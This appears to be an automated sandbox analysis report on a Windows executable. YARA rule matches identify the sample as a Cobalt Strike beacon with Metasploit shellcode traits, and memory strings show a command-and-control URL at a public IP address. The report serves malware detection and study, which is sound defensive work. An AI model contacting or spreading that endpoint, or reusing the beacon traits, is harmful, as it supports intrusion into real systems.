            Source: 7kSftA4Eoh.exe, 00000000.00000003.2791907620.0000000000151000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2497560445.0000000000151000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2357156436.0000000000151000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://8.130.42.227:10001/en_US/all.jsSessionKeyBackward
            Source: 7kSftA4Eoh.exe, 00000000.00000003.2188573468.0000000000185000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2154291765.0000000000185000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2143627230.0000000000185000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://8.130.42.227:10001/en_US/all.jsT
            Source: 7kSftA4Eoh.exe, 00000000.00000003.2497560445.0000000000151000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://8.130.42.227:10001/en_US/all.jsU
            Source: 7kSftA4Eoh.exe, 00000000.00000003.2357156436.0000000000151000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://8.130.42.227:10001/en_US/all.jsWindows
            Source: 7kSftA4Eoh.exe, 00000000.00000003.2497560445.0000000000151000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://8.130.42.227:10001/en_US/all.jsdo
            Source: 7kSftA4Eoh.exe, 00000000.00000002.4125449731.0000000000151000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2791907620.0000000000151000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://8.130.42.227:10001/en_US/all.jsdob4k
            Source: 7kSftA4Eoh.exe, 00000000.00000002.4125449731.0000000000151000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2791907620.0000000000151000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2497560445.0000000000151000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2357156436.0000000000151000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://8.130.42.227:10001/en_US/all.jsm
            Source: 7kSftA4Eoh.exe, 00000000.00000003.2067405841.0000000000185000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2132660259.0000000000185000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2166831679.0000000000185000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2089166658.0000000000185000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2056644230.0000000000185000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2154291765.0000000000185000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2143627230.0000000000185000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2078222580.0000000000185000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2121871297.0000000000185000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://8.130.42.227:10001/en_US/all.jsn
            Source: 7kSftA4Eoh.exe, 00000000.00000002.4125449731.0000000000151000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://8.130.42.227:10001/en_US/all.jssi
            Source: 7kSftA4Eoh.exe, 00000000.00000002.4125449731.0000000000151000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2791907620.0000000000151000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://8.130.42.227:10001/en_US/all.jssiZ4#
            Source: 7kSftA4Eoh.exe, 00000000.00000003.2497560445.0000000000151000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2357156436.0000000000151000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://8.130.42.227:10001/en_US/all.jssij4s

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 0.2.7kSftA4Eoh.exe.990000.1.raw.unpack, type: UNPACKEDPEMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
            Source: 0.2.7kSftA4Eoh.exe.990000.1.raw.unpack, type: UNPACKEDPEMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
            Source: 0.2.7kSftA4Eoh.exe.990000.1.raw.unpack, type: UNPACKEDPEMatched rule: Rule for beacon reflective loader Author: unknown
            Source: 0.2.7kSftA4Eoh.exe.990000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
            Source: 0.2.7kSftA4Eoh.exe.990000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
            Source: 0.2.7kSftA4Eoh.exe.990000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
            Source: 0.2.7kSftA4Eoh.exe.990000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Cobalt Strike loader Author: @VK_Intel
            Source: 0.2.7kSftA4Eoh.exe.990000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
            Source: 0.2.7kSftA4Eoh.exe.990000.1.raw.unpack, type: UNPACKEDPEMatched rule: CobaltStrike payload Author: ditekSHen
            Source: 0.2.7kSftA4Eoh.exe.990000.1.unpack, type: UNPACKEDPEMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
            Source: 0.2.7kSftA4Eoh.exe.990000.1.unpack, type: UNPACKEDPEMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
            Source: 0.2.7kSftA4Eoh.exe.990000.1.unpack, type: UNPACKEDPEMatched rule: Rule for beacon reflective loader Author: unknown
            Source: 0.2.7kSftA4Eoh.exe.990000.1.unpack, type: UNPACKEDPEMatched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
            Source: 0.2.7kSftA4Eoh.exe.990000.1.unpack, type: UNPACKEDPEMatched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
            Source: 0.2.7kSftA4Eoh.exe.990000.1.unpack, type: UNPACKEDPEMatched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
            Source: 0.2.7kSftA4Eoh.exe.990000.1.unpack, type: UNPACKEDPEMatched rule: Detects Cobalt Strike loader Author: @VK_Intel
            Source: 0.2.7kSftA4Eoh.exe.990000.1.unpack, type: UNPACKEDPEMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
            Source: 0.2.7kSftA4Eoh.exe.990000.1.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
            Source: 0.2.7kSftA4Eoh.exe.990000.1.unpack, type: UNPACKEDPEMatched rule: CobaltStrike payload Author: ditekSHen
            Source: 00000000.00000002.4126310737.00000000009F0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon sleep obfuscation routine Author: unknown
            Source: 00000000.00000002.4125434545.00000000000D0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
            Source: 00000000.00000002.4125434545.00000000000D0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
            Source: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
            Source: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
            Source: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon sleep obfuscation routine Author: unknown
            Source: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
            Source: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
            Source: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
            Source: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 Author: unknown
            Source: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
            Source: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
            Source: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
            Source: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
            Source: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
            Source: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
            Source: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Cobalt Strike loader Author: @VK_Intel
            Source: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
            Source: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: CobaltStrike payload Author: ditekSHen
            Source: Process Memory Space: 7kSftA4Eoh.exe PID: 6992, type: MEMORYSTRMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
            Source: Process Memory Space: 7kSftA4Eoh.exe PID: 6992, type: MEMORYSTRMatched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
            Source: Process Memory Space: 7kSftA4Eoh.exe PID: 6992, type: MEMORYSTRMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exeCode function: 0_2_009BE080 CreateProcessAsUserA,0_2_009BE080
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exeCode function: 0_2_0099D7800_2_0099D780
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exeCode function: 0_2_009B91800_2_009B9180
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exeCode function: 0_2_009A61A80_2_009A61A8
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exeCode function: 0_2_009A01E80_2_009A01E8
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exeCode function: 0_2_009BB1000_2_009BB100
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exeCode function: 0_2_009AC1480_2_009AC148
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exeCode function: 0_2_0099A2800_2_0099A280
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exeCode function: 0_2_009B82B00_2_009B82B0
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exeCode function: 0_2_009B22B40_2_009B22B4
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exeCode function: 0_2_009AE2C80_2_009AE2C8
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exeCode function: 0_2_009B9AF00_2_009B9AF0
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exeCode function: 0_2_009ADB5C0_2_009ADB5C
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exeCode function: 0_2_009A6C980_2_009A6C98
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exeCode function: 0_2_009B745C0_2_009B745C
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exeCode function: 0_2_009AED3C0_2_009AED3C
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exeCode function: 0_2_00999D6C0_2_00999D6C
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exeCode function: 0_2_009B8E970_2_009B8E97
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exeCode function: 0_2_009ACF140_2_009ACF14
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exeCode function: 0_2_0354CBC70_2_0354CBC7
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exeCode function: 0_2_0355E1830_2_0355E183
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exeCode function: 0_2_0355D70F0_2_0355D70F
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exeCode function: 0_2_0355CFA30_2_0355CFA3
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exeCode function: 0_2_0355B58F0_2_0355B58F
            Source: 0.2.7kSftA4Eoh.exe.990000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
            Source: 0.2.7kSftA4Eoh.exe.990000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
            Source: 0.2.7kSftA4Eoh.exe.990000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
            Source: 0.2.7kSftA4Eoh.exe.990000.1.raw.unpack, type: UNPACKEDPEMatched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.2.7kSftA4Eoh.exe.990000.1.raw.unpack, type: UNPACKEDPEMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
            Source: 0.2.7kSftA4Eoh.exe.990000.1.raw.unpack, type: UNPACKEDPEMatched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.2.7kSftA4Eoh.exe.990000.1.raw.unpack, type: UNPACKEDPEMatched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
            Source: 0.2.7kSftA4Eoh.exe.990000.1.raw.unpack, type: UNPACKEDPEMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.2.7kSftA4Eoh.exe.990000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
            Source: 0.2.7kSftA4Eoh.exe.990000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
            Source: 0.2.7kSftA4Eoh.exe.990000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
            Source: 0.2.7kSftA4Eoh.exe.990000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
            Source: 0.2.7kSftA4Eoh.exe.990000.1.unpack, type: UNPACKEDPEMatched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.2.7kSftA4Eoh.exe.990000.1.unpack, type: UNPACKEDPEMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
            Source: 0.2.7kSftA4Eoh.exe.990000.1.unpack, type: UNPACKEDPEMatched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.2.7kSftA4Eoh.exe.990000.1.unpack, type: UNPACKEDPEMatched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
            Source: 0.2.7kSftA4Eoh.exe.990000.1.unpack, type: UNPACKEDPEMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.2.7kSftA4Eoh.exe.990000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
            Source: 0.2.7kSftA4Eoh.exe.990000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
            Source: 00000000.00000002.4126310737.00000000009F0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
            Source: 00000000.00000002.4125434545.00000000000D0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
            Source: 00000000.00000002.4125434545.00000000000D0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
            Source: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
            Source: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
            Source: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
            Source: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
            Source: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
            Source: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 date_created = 2020-12-02, rev = FireEye, date_modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
            Source: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
            Source: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
            Source: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
            Source: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
            Source: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
